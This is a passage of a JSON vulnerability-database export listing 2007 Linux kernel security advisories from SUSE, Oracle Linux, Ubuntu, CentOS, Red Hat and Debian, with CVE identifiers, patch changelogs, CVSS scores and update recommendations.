"2007-10-12T16:04:36", "published": "2007-10-12T16:04:36", "id": "SUSE-SA:2007:053", "href": "http://lists.opensuse.org/opensuse-security-announce/2007-10/msg00000.html", "type": "suse", "title": "local privilege escalation in kernel", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:56:25", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2876", "CVE-2007-3848", "CVE-2007-3107", "CVE-2007-3851", "CVE-2007-3105", "CVE-2007-3513", "CVE-2007-2242", "CVE-2007-2453", "CVE-2007-2525"], "description": "The Linux kernel in SLE 10 and SUSE Linux 10.1 was updated to fix various security issues and lots of bugs spotted after the Service Pack 1 release.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2007-09-06T17:18:55", "published": "2007-09-06T17:18:55", "id": "SUSE-SA:2007:051", "href": "http://lists.opensuse.org/opensuse-security-announce/2007-09/msg00000.html", "title": "remote denial of service in kernel", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:43", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4573", "CVE-2007-3848", "CVE-2007-3105", "CVE-2007-3843", "CVE-2007-3740"], "description": " [2.6.9-55.0.9.0.1]\n - fix entropy flag in bnx2 driver to generate entropy pool (John \n Sobecki) [orabug 5931647]\n - fix for nfs open call taking longer issue (Chuck Lever) orabug 5580407 \n bz [219412]\n - fix enomem due to larger mtu size page alloc (Zach Brown) orabug 5486128\n - fix per_cpu() api bug_on with rds (Zach Brown) orabug 5760648\n - limit nr_requests in cfq io scheduler ( Jens Axboe) bz 234278 orabug \n 5899829\n \n [2.6.9-55.0.9]\n - revert: all patches from 2.6.9-55.0.7\n \n [2.6.9-55.0.8]\n - fix x86_64 (+ xen) syscall vulnerability (Vitaly Mayatskikh) [297851] \n {CVE-2007-4573}\n \n [2.6.9-55.0.7]\n - fix autofs problem with symbolic links (Ian Kent) [248126]\n - fix privilege escalation via PR_SET_PDEATHSIG (Peter Zijlstra) \n [252306] {CVE-2007-3848}\n - fix bound check ordering issue in random driver (Vitaly Mayatskikh) \n [275941] {CVE-2007-3105}\n - fix memory leak of dma_alloc_coherent() on x86_64 (Prarit Bhargava) \n [282351]\n - makes CIFS honour a process' umask (Jeff Layton) [293121] {CVE-2007-3740}\n - fix signing mount options and error handling for CIFS (Jeff Layton) \n [293141] {CVE-2007-3843} ", "edition": 4, "modified": "2007-09-28T00:00:00", "published": "2007-09-28T00:00:00", "id": "ELSA-2007-0937", "href": "http://linux.oracle.com/errata/ELSA-2007-0937.html", "title": "Important: kernel security update ", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3848", "CVE-2007-3739", "CVE-2007-3105", "CVE-2007-4308", "CVE-2007-3843", "CVE-2007-3740", "CVE-2007-4571", "CVE-2006-6921", "CVE-2007-2878"], "description": " [2.6.9-55.0.12.0.1]\n - fix entropy flag in bnx2 driver to generate entropy pool (John \n Sobecki) [orabug 5931647]\n - fix for nfs open call taking longer issue (Chuck Lever) orabug 5580407 \n bz [219412]\n - fix enomem due to larger mtu size page alloc (Zach Brown) orabug 5486128\n - fix per_cpu() api bug_on with rds (Zach Brown) orabug 5760648\n - limit nr_requests in cfq io scheduler ( Jens Axboe) bz 234278 orabug \n 5899829\n \n [2.6.9-55.0.12]\n - update: deadlock from recursive call through netpoll_send_skb (Neil \n Horman) [328351]\n - fix machine check errors with Clovertown G0-step CPU (Geoff Gustafson) \n [320791]\n - fix disable block layer bouncing for most memory on 64bit systems (Jim \n Paradis) [330111]\n \n [2.6.9-55.0.11]\n - fix denial of service with wedged processes (Vitaly Mayatskikh) \n [302931] {CVE-2006-6921}\n - fix stack growing into hugetlb reserved regions (Vitaly Mayatskikh) \n [294971] {CVE-2007-3739}\n - fix creating of RHEL4u5 guest domain on i686 RHEL-5.1 host (Chris \n Lalancette) [251013]\n - fix memory leak in __bio_map_user (Eric Sandeen) [328371]\n - fix deadlock from recursive call through netpoll_send_skb (Neil \n Horman) [328351]\n - fix ALSA memory disclosure flaw (Vitaly Mayatskikh) [297741] \n {CVE-2007-4571}\n - fix missing ioctl() permission checks in aacraid driver (Vitaly \n Mayatskikh) [298341] {CVE-2007-4308}\n - fix VFAT compat ioctls DoS on 64-bit (Eric Sandeen) [253316] \n {CVE-2007-2878}\n \n [2.6.9-55.0.10]\n - fix: automounter hangs with rapid access to the same mount point when \n the system is under high load (Ian Kent) [309781]\n - restored: all patches from 2.6.9-55.0.7 ", "edition": 4, "modified": "2007-11-02T00:00:00", "published": "2007-11-02T00:00:00", "id": "ELSA-2007-0939", "href": "http://linux.oracle.com/errata/ELSA-2007-0939.html", "title": "Important: kernel security update ", "type": "oraclelinux", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:47", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4573", "CVE-2007-3848", "CVE-2007-4133", "CVE-2007-3380", "CVE-2007-3105", "CVE-2007-3513", "CVE-2007-4574", "CVE-2007-3731", "CVE-2007-3733", "CVE-2007-3850"], "description": " [2.6.18-8.1.14.0.2.el5]\n - Fix bonding primary=ethX (Bert Barbe) [IT 101532] [ORA 5136660]\n - Add entropy module option to e1000/bnx2 (John Sobecki) [ORA 6045759]\n \n [2.6.18-8.1.14.el5]\n - Revert changes back to 2.6.18-8.1.10.\n - [x86_64] Zero extend all registers after ptrace in 32bit entry path \n (Anton Arapov ) [297871] {CVE-2007-4573}\n \n [2.6.18-8.1.12.el5]\n - [x86_64] Don't leak NT bit into next task (Dave Anderson ) [298151] \n {CVE-2007-4574}\n - [fs] Reset current->pdeath_signal on SUID binary execution (Peter \n Zijlstra ) [252307] {CVE-2007-3848}\n - [misc] Bounds check ordering issue in random driver (Anton Arapov ) \n [275961] {CVE-2007-3105}\n - [usb] usblcd: Locally triggerable memory consumption (Anton Arapov ) \n [276001] {CVE-2007-3513}\n - [x86_64] Zero extend all registers after ptrace in 32bit entry path \n (Anton Arapov ) [297871] {CVE-2007-4573}\n - [net] igmp: check for NULL when allocating GFP_ATOMIC skbs (Neil \n Horman ) [303281]\n \n [2.6.18-8.1.11.el5]\n - [xen] Guest access to MSR may cause system crash/data corruption \n (Bhavana Nagendra ) [253312] {CVE-2007-3733}\n - [dlm] A TCP connection to DLM port blocks DLM operations (Patrick \n Caulfield ) [245922] {CVE-2007-3380}\n - [ppc] 4k page mapping support for userspace in 64k kernels (Scott \n Moser ) [275841] {CVE-2007-3850}\n - [ptrace] NULL pointer dereference triggered by ptrace (Anton Arapov ) \n [275981] {CVE-2007-3731}\n - [fs] hugetlb: fix prio_tree unit (Konrad Rzeszutek ) [253929] \n {CVE-2007-4133} ", "edition": 4, "modified": "2007-09-30T00:00:00", "published": "2007-09-30T00:00:00", "id": "ELSA-2007-0936", "href": "http://linux.oracle.com/errata/ELSA-2007-0936.html", "title": "Important: kernel security update ", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-09T00:28:38", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2876", "CVE-2007-3848", "CVE-2007-3104", "CVE-2007-3851", "CVE-2007-3105", "CVE-2007-3513", "CVE-2007-4308", "CVE-2007-3843", "CVE-2007-2875", "CVE-2007-3642", "CVE-2007-2878", "CVE-2007-2525"], "description": "A flaw was discovered in the PPP over Ethernet implementation. Local \nattackers could manipulate ioctls and cause kernel memory consumption \nleading to a denial of service. (CVE-2007-2525)\n\nAn integer underflow was discovered in the cpuset filesystem. If mounted, \nlocal attackers could obtain kernel memory using large file offsets while \nreading the tasks file. This could disclose sensitive data. (CVE-2007-2875)\n\nVilmos Nebehaj discovered that the SCTP netfilter code did not correctly \nvalidate certain states. A remote attacker could send a specially crafted \npacket causing a denial of service. (CVE-2007-2876)\n\nLuca Tettamanti discovered a flaw in the VFAT compat ioctls on 64-bit \nsystems. A local attacker could corrupt a kernel_dirent struct and cause \na denial of service. (CVE-2007-2878)\n\nA flaw in the sysfs_readdir function allowed a local user to cause a \ndenial of service by dereferencing a NULL pointer. (CVE-2007-3104)\n\nA buffer overflow was discovered in the random number generator. In \nenvironments with granular assignment of root privileges, a local attacker \ncould gain additional privileges. (CVE-2007-3105)\n\nA flaw was discovered in the usblcd driver. A local attacker could cause \nlarge amounts of kernel memory consumption, leading to a denial of service. \n(CVE-2007-3513)\n\nZhongling Wen discovered that the h323 conntrack handler did not correctly \nhandle certain bitfields. A remote attacker could send a specially crafted \npacket and cause a denial of service. (CVE-2007-3642)\n\nA flaw was discovered in the CIFS mount security checking. Remote attackers \ncould spoof CIFS network traffic, which could lead a client to trust the \nconnection. (CVE-2007-3843)\n\nIt was discovered that certain setuid-root processes did not correctly \nreset process death signal handlers. A local user could manipulate this \nto send signals to processes they would not normally have access to. \n(CVE-2007-3848)\n\nThe Direct Rendering Manager for the i915 driver could be made to write \nto arbitrary memory locations. An attacker with access to a running X11 \nsession could send a specially crafted buffer and gain root privileges. \n(CVE-2007-3851)\n\nIt was discovered that the aacraid SCSI driver did not correctly check \npermissions on certain ioctls. A local attacker could cause a denial \nof service or gain privileges. (CVE-2007-4308)", "edition": 5, "modified": "2007-08-31T00:00:00", "published": "2007-08-31T00:00:00", "id": "USN-510-1", "href": "https://ubuntu.com/security/notices/USN-510-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-09T01:36:25", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3848", "CVE-2007-3104", "CVE-2005-0504", "CVE-2007-3105", "CVE-2007-4308", "CVE-2007-2242"], "description": "A buffer overflow was discovered in the Moxa serial driver. Local \nattackers could execute arbitrary code and gain root privileges. \n(CVE-2005-0504)\n\nA flaw was discovered in the IPv6 stack's handling of type 0 route headers. \nBy sending a specially crafted IPv6 packet, a remote attacker could cause \na denial of service between two IPv6 hosts. (CVE-2007-2242)\n\nA flaw in the sysfs_readdir function allowed a local user to cause a \ndenial of service by dereferencing a NULL pointer. (CVE-2007-3104)\n\nA buffer overflow was discovered in the random number generator. In \nenvironments with granular assignment of root privileges, a local attacker \ncould gain additional privileges. (CVE-2007-3105)\n\nIt was discovered that certain setuid-root processes did not correctly \nreset process death signal handlers. A local user could manipulate this \nto send signals to processes they would not normally have access to. \n(CVE-2007-3848)\n\nIt was discovered that the aacraid SCSI driver did not correctly check \npermissions on certain ioctls. A local attacker could cause a denial \nof service or gain privileges. (CVE-2007-4308)", "edition": 5, "modified": "2007-08-31T00:00:00", "published": "2007-08-31T00:00:00", "id": "USN-508-1", "href": "https://ubuntu.com/security/notices/USN-508-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-08T23:34:58", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3848", "CVE-2007-3104", "CVE-2007-3851", "CVE-2007-3105", "CVE-2007-3513", "CVE-2007-4308"], "description": "A flaw in the sysfs_readdir function allowed a local user to cause a \ndenial of service by dereferencing a NULL pointer. (CVE-2007-3104)\n\nA buffer overflow was discovered in the random number generator. In \nenvironments with granular assignment of root privileges, a local attacker \ncould gain additional privileges. (CVE-2007-3105)\n\nA flaw was discovered in the usblcd driver. A local attacker could cause \nlarge amounts of kernel memory consumption, leading to a denial of service. \n(CVE-2007-3513)\n\nIt was discovered that certain setuid-root processes did not correctly \nreset process death signal handlers. A local user could manipulate this \nto send signals to processes they would not normally have access to. \n(CVE-2007-3848)\n\nThe Direct Rendering Manager for the i915 driver could be made to write \nto arbitrary memory locations. An attacker with access to a running X11 \nsession could send a specially crafted buffer and gain root privileges. \n(CVE-2007-3851)\n\nIt was discovered that the aacraid SCSI driver did not correctly check \npermissions on certain ioctls. A local attacker could cause a denial \nof service or gain privileges. (CVE-2007-4308)", "edition": 5, "modified": "2007-08-30T00:00:00", "published": "2007-08-30T00:00:00", "id": "USN-509-1", "href": "https://ubuntu.com/security/notices/USN-509-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.0, "vector": "AV:L/AC:H/Au:S/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:26:09", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3848", "CVE-2007-3739", "CVE-2007-3105", "CVE-2007-4308", "CVE-2007-3843", "CVE-2007-3740", "CVE-2007-4571", "CVE-2006-6921", "CVE-2007-2878"], "description": "**CentOS Errata and Security Advisory** CESA-2007:0939\n\n\nThe Linux kernel is the core of the operating system.\r\n\r\nThese updated kernel packages contain fixes for the following security\r\nissues:\r\n\r\n* A flaw was found in the handling of process death signals. This allowed a\r\nlocal user to send arbitrary signals to the suid-process executed by that\r\nuser. A successful exploitation of this flaw depends on the structure of\r\nthe suid-program and its signal handling. (CVE-2007-3848, Important)\r\n\r\n* A flaw was found in the CIFS file system. This could cause the umask\r\nvalues of a process to not be honored on CIFS file systems where UNIX\r\nextensions are supported. (CVE-2007-3740, Important)\r\n\r\n* A flaw was found in the VFAT compat ioctl handling on 64-bit systems. \r\nThis allowed a local user to corrupt a kernel_dirent struct and cause a\r\ndenial of service. (CVE-2007-2878, Important) \r\n\r\n* A flaw was found in the Advanced Linux Sound Architecture (ALSA). A local\r\nuser who had the ability to read the /proc/driver/snd-page-alloc file could\r\nsee portions of kernel memory. (CVE-2007-4571, Moderate) \r\n\r\n* A flaw was found in the aacraid SCSI driver. This allowed a local user to\r\nmake ioctl calls to the driver that should be restricted to privileged\r\nusers. (CVE-2007-4308, Moderate) \r\n\r\n* A flaw was found in the stack expansion when using the hugetlb kernel on\r\nPowerPC systems. This allowed a local user to cause a denial of service.\r\n(CVE-2007-3739, Moderate) \r\n\r\n* A flaw was found in the handling of zombie processes. A local user could\r\ncreate processes that would not be properly reaped which could lead to a\r\ndenial of service. (CVE-2006-6921, Moderate)\r\n\r\n* A flaw was found in the CIFS file system handling. The mount option\r\n\"sec=\" did not enable integrity checking or produce an error message if\r\nused. (CVE-2007-3843, Low)\r\n\r\n* A flaw was found in the random number generator implementation that\r\nallowed a local user to cause a denial of service or possibly gain\r\nprivileges. This flaw could be exploited if the root user raised the\r\ndefault wakeup threshold over the size of the output pool.\r\n(CVE-2007-3105, Low)\r\n\r\nAdditionally, the following bugs were fixed:\r\n\r\n* A flaw was found in the kernel netpoll code, creating a potential\r\ndeadlock condition. If the xmit_lock for a given network interface is\r\nheld, and a subsequent netpoll event is generated from within the lock\r\nowning context (a console message for example), deadlock on that cpu will\r\nresult, because the netpoll code will attempt to re-acquire the xmit_lock.\r\n The fix is to, in the netpoll code, only attempt to take the lock, and\r\nfail if it is already acquired (rather than block on it), and queue the\r\nmessage to be sent for later delivery. Any user of netpoll code in the\r\nkernel (netdump or netconsole services), is exposed to this problem, and\r\nshould resolve the issue by upgrading to this kernel release immediately.\r\n\r\n* A flaw was found where, under 64-bit mode (x86_64), AMD processors were\r\nnot able to address greater than a 40-bit physical address space; and Intel\r\nprocessors were only able to address up to a 36-bit physical address space. \r\nThe fix is to increase the physical addressing for an AMD processor to 48\r\nbits, and an Intel processor to 38 bits. Please see the Red Hat\r\nKnowledgebase for more detailed information.\r\n\r\n* A flaw was found in the xenU kernel that may prevent a paravirtualized\r\nguest with more than one CPU from starting when running under an Enterprise\r\nLinux 5.1 hypervisor. The fix is to allow your Enterprise Linux 4 Xen SMP\r\nguests to boot under a 5.1 hypervisor. Please see the Red Hat Knowledgebase\r\nfor more detailed information.\r\n \r\nRed Hat Enterprise Linux 4 users are advised to upgrade to these updated\r\npackages, which contain backported patches to correct these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-November/026396.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-November/026397.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-November/026398.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-November/026399.html\n\n**Affected packages:**\nkernel\nkernel-devel\nkernel-doc\nkernel-hugemem\nkernel-hugemem-devel\nkernel-largesmp\nkernel-largesmp-devel\nkernel-smp\nkernel-smp-devel\nkernel-xenU\nkernel-xenU-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0939.html", "edition": 4, "modified": "2007-11-04T01:49:18", "published": "2007-11-03T02:32:41", "href": "http://lists.centos.org/pipermail/centos-announce/2007-November/026396.html", "id": "CESA-2007:0939", "title": "kernel security update", "type": "centos", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-20T18:27:20", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4573"], "description": "**CentOS Errata and Security Advisory** CESA-2007:0936\n\n\nThe Linux kernel handles the basic functions of the operating system.\r\n\r\nA flaw was found in the IA32 system call emulation provided on AMD64 and\r\nIntel 64 platforms. An improperly validated 64-bit value could be stored in\r\nthe %RAX register, which could trigger an out-of-bounds system call table\r\naccess. An untrusted local user could exploit this flaw to run code in the\r\nkernel (ie a root privilege escalation). (CVE-2007-4573).\r\n\r\nRed Hat would like to thank Wojciech Purczynski for reporting this issue.\r\n\r\nRed Hat Enterprise Linux 5 users are advised to upgrade to these packages,\r\nwhich contain a backported patch to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-September/026300.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-September/026301.html\n\n**Affected packages:**\nkernel\nkernel-PAE\nkernel-PAE-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-xen\nkernel-xen-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0936.html", "edition": 3, "modified": "2007-09-28T11:16:19", "published": "2007-09-28T11:16:01", "href": "http://lists.centos.org/pipermail/centos-announce/2007-September/026300.html", "id": "CESA-2007:0936", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:25:41", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4573"], "description": "**CentOS Errata and Security Advisory** CESA-2007:0937\n\n\nThe Linux kernel handles the basic functions of the operating system.\r\n\r\nA flaw was found in the IA32 system call emulation provided on AMD64 and\r\nIntel 64 platforms. An improperly validated 64-bit value could be stored in\r\nthe %RAX register, which could trigger an out-of-bounds system call table\r\naccess. An untrusted local user could exploit this flaw to run code in the\r\nkernel (ie a root privilege escalation). (CVE-2007-4573).\r\n\r\nRed Hat would like to thank Wojciech Purczynski for reporting this issue.\r\n\r\nRed Hat Enterprise Linux 4 users are advised to upgrade to these packages,\r\nwhich contain a backported patch to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-September/026289.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-September/026297.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-September/026302.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-September/026303.html\n\n**Affected packages:**\nkernel\nkernel-devel\nkernel-doc\nkernel-hugemem\nkernel-hugemem-devel\nkernel-largesmp\nkernel-largesmp-devel\nkernel-smp\nkernel-smp-devel\nkernel-xenU\nkernel-xenU-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0937.html", "edition": 4, "modified": "2007-09-28T11:17:00", "published": "2007-09-28T03:13:34", "href": "http://lists.centos.org/pipermail/centos-announce/2007-September/026289.html", "id": "CESA-2007:0937", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-08T03:34:27", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4573"], "description": "**CentOS Errata and Security Advisory** CESA-2007:0938\n\n\nThe Linux kernel handles the basic functions of the operating system.\r\n\r\nA flaw was found in ia32 emulation affecting users running 64-bit versions\r\nof Red Hat Enterprise Linux on x86_64 architectures. A local user could\r\nuse this flaw to gain elevated privileges. (CVE-2007-4573). \r\n\r\nRed Hat would like to thank Wojciech Purczynski for reporting this issue.\r\n\r\nRed Hat Enterprise Linux 3 users are advised to upgrade to these packages,\r\nwhich contain a backported patch to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-September/026285.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-September/026287.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-September/026288.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-September/026290.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-September/038619.html\n\n**Affected packages:**\nkernel\nkernel-BOOT\nkernel-doc\nkernel-hugemem\nkernel-hugemem-unsupported\nkernel-smp\nkernel-smp-unsupported\nkernel-source\nkernel-unsupported\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0938.html", "edition": 7, "modified": "2007-09-28T06:02:11", "published": "2007-09-27T23:39:10", "href": "http://lists.centos.org/pipermail/centos-announce/2007-September/026285.html", "id": "CESA-2007:0938", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:55", "bulletinFamily": "unix", "cvelist": ["CVE-2006-6921", "CVE-2007-2878", "CVE-2007-3105", "CVE-2007-3739", "CVE-2007-3740", "CVE-2007-3843", "CVE-2007-3848", "CVE-2007-4308", "CVE-2007-4571"], "description": "The Linux kernel is the core of the operating system.\r\n\r\nThese updated kernel packages contain fixes for the following security\r\nissues:\r\n\r\n* A flaw was found in the handling of process death signals. This allowed a\r\nlocal user to send arbitrary signals to the suid-process executed by that\r\nuser. A successful exploitation of this flaw depends on the structure of\r\nthe suid-program and its signal handling. (CVE-2007-3848, Important)\r\n\r\n* A flaw was found in the CIFS file system. This could cause the umask\r\nvalues of a process to not be honored on CIFS file systems where UNIX\r\nextensions are supported. (CVE-2007-3740, Important)\r\n\r\n* A flaw was found in the VFAT compat ioctl handling on 64-bit systems. \r\nThis allowed a local user to corrupt a kernel_dirent struct and cause a\r\ndenial of service. (CVE-2007-2878, Important) \r\n\r\n* A flaw was found in the Advanced Linux Sound Architecture (ALSA). A local\r\nuser who had the ability to read the /proc/driver/snd-page-alloc file could\r\nsee portions of kernel memory. (CVE-2007-4571, Moderate) \r\n\r\n* A flaw was found in the aacraid SCSI driver. This allowed a local user to\r\nmake ioctl calls to the driver that should be restricted to privileged\r\nusers. (CVE-2007-4308, Moderate) \r\n\r\n* A flaw was found in the stack expansion when using the hugetlb kernel on\r\nPowerPC systems. This allowed a local user to cause a denial of service.\r\n(CVE-2007-3739, Moderate) \r\n\r\n* A flaw was found in the handling of zombie processes. A local user could\r\ncreate processes that would not be properly reaped which could lead to a\r\ndenial of service. (CVE-2006-6921, Moderate)\r\n\r\n* A flaw was found in the CIFS file system handling. The mount option\r\n\"sec=\" did not enable integrity checking or produce an error message if\r\nused. (CVE-2007-3843, Low)\r\n\r\n* A flaw was found in the random number generator implementation that\r\nallowed a local user to cause a denial of service or possibly gain\r\nprivileges. This flaw could be exploited if the root user raised the\r\ndefault wakeup threshold over the size of the output pool.\r\n(CVE-2007-3105, Low)\r\n\r\nAdditionally, the following bugs were fixed:\r\n\r\n* A flaw was found in the kernel netpoll code, creating a potential\r\ndeadlock condition. If the xmit_lock for a given network interface is\r\nheld, and a subsequent netpoll event is generated from within the lock\r\nowning context (a console message for example), deadlock on that cpu will\r\nresult, because the netpoll code will attempt to re-acquire the xmit_lock.\r\n The fix is to, in the netpoll code, only attempt to take the lock, and\r\nfail if it is already acquired (rather than block on it), and queue the\r\nmessage to be sent for later delivery. Any user of netpoll code in the\r\nkernel (netdump or netconsole services), is exposed to this problem, and\r\nshould resolve the issue by upgrading to this kernel release immediately.\r\n\r\n* A flaw was found where, under 64-bit mode (x86_64), AMD processors were\r\nnot able to address greater than a 40-bit physical address space; and Intel\r\nprocessors were only able to address up to a 36-bit physical address space. \r\nThe fix is to increase the physical addressing for an AMD processor to 48\r\nbits, and an Intel processor to 38 bits. Please see the Red Hat\r\nKnowledgebase for more detailed information.\r\n\r\n* A flaw was found in the xenU kernel that may prevent a paravirtualized\r\nguest with more than one CPU from starting when running under an Enterprise\r\nLinux 5.1 hypervisor. The fix is to allow your Enterprise Linux 4 Xen SMP\r\nguests to boot under a 5.1 hypervisor. Please see the Red Hat Knowledgebase\r\nfor more detailed information.\r\n \r\nRed Hat Enterprise Linux 4 users are advised to upgrade to these updated\r\npackages, which contain backported patches to correct these issues.", "modified": "2017-09-08T11:48:49", "published": "2007-11-01T04:00:00", "id": "RHSA-2007:0939", "href": "https://access.redhat.com/errata/RHSA-2007:0939", "type": "redhat", "title": "(RHSA-2007:0939) Important: kernel security update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:47:01", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4573"], "description": "The Linux kernel handles the basic functions of the operating system.\r\n\r\nA flaw was found in ia32 emulation affecting users running 64-bit versions\r\nof Red Hat Enterprise Linux on x86_64 architectures. A local user could\r\nuse this flaw to gain elevated privileges. (CVE-2007-4573). \r\n\r\nRed Hat would like to thank Wojciech Purczynski for reporting this issue.\r\n\r\nRed Hat Enterprise Linux 3 users are advised to upgrade to these packages,\r\nwhich contain a backported patch to correct this issue.", "modified": "2017-07-28T18:43:27", "published": "2007-09-27T04:00:00", "id": "RHSA-2007:0938", "href": "https://access.redhat.com/errata/RHSA-2007:0938", "type": "redhat", "title": "(RHSA-2007:0938) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:53", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4573"], "description": "The Linux kernel handles the basic functions of the operating system.\r\n\r\nA flaw was found in the IA32 system call emulation provided on AMD64 and\r\nIntel 64 platforms. An improperly validated 64-bit value could be stored in\r\nthe %RAX register, which could trigger an out-of-bounds system call table\r\naccess. An untrusted local user could exploit this flaw to run code in the\r\nkernel (ie a root privilege escalation). (CVE-2007-4573).\r\n\r\nRed Hat would like to thank Wojciech Purczynski for reporting this issue.\r\n\r\nRed Hat Enterprise Linux 4 users are advised to upgrade to these packages,\r\nwhich contain a backported patch to correct this issue.", "modified": "2017-09-08T11:58:38", "published": "2007-09-27T04:00:00", "id": "RHSA-2007:0937", "href": "https://access.redhat.com/errata/RHSA-2007:0937", "type": "redhat", "title": "(RHSA-2007:0937) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:44", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4573"], "description": "The Linux kernel handles the basic functions of the operating system.\r\n\r\nA flaw was found in the IA32 system call emulation provided on AMD64 and\r\nIntel 64 platforms. An improperly validated 64-bit value could be stored in\r\nthe %RAX register, which could trigger an out-of-bounds system call table\r\naccess. An untrusted local user could exploit this flaw to run code in the\r\nkernel (ie a root privilege escalation). (CVE-2007-4573).\r\n\r\nRed Hat would like to thank Wojciech Purczynski for reporting this issue.\r\n\r\nRed Hat Enterprise Linux 5 users are advised to upgrade to these packages,\r\nwhich contain a backported patch to correct this issue.", "modified": "2017-09-08T11:58:37", "published": "2007-09-27T04:00:00", "id": "RHSA-2007:0936", "href": "https://access.redhat.com/errata/RHSA-2007:0936", "type": "redhat", "title": "(RHSA-2007:0936) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:16:47", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2172", "CVE-2007-2876", "CVE-2007-3848", "CVE-2007-1353", "CVE-2007-3851", "CVE-2007-3513", "CVE-2007-2453", "CVE-2007-3642", "CVE-2007-2525"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1356-1 security@debian.org\nhttp://www.debian.org/security/ Dann Frazier\nAugust 15th, 2007 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : linux-2.6\nVulnerability : several\nProblem-Type : local/remote\nDebian-specific: no\nCVE ID : CVE-2007-1353 CVE-2007-2172 CVE-2007-2453 CVE-2007-2525\n CVE-2007-2876 CVE-2007-3513 CVE-2007-3642 CVE-2007-3848\n CVE-2007-3851\n \nSeveral local and remote vulnerabilities have been discovered in the Linux\nkernel that may lead to a denial of service or the execution of arbitrary\ncode. The Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCVE-2007-1353\n\n Ilja van Sprundel discovered that kernel memory could be leaked via the\n Bluetooth setsockopt call due to an uninitialized stack buffer. This\n could be used by local attackers to read the contents of sensitive kernel\n memory.\n\nCVE-2007-2172\n\n Thomas Graf reported a typo in the DECnet protocol handler that could\n be used by a local attacker to overrun an array via crafted packets,\n potentially resulting in a Denial of Service (system crash).\n A similar issue exists in the IPV4 protocol handler and will be fixed\n in a subsequent update.\n\nCVE-2007-2453\n\n A couple of issues with random number generation were discovered.\n Slightly less random numbers resulted from hashing a subset of 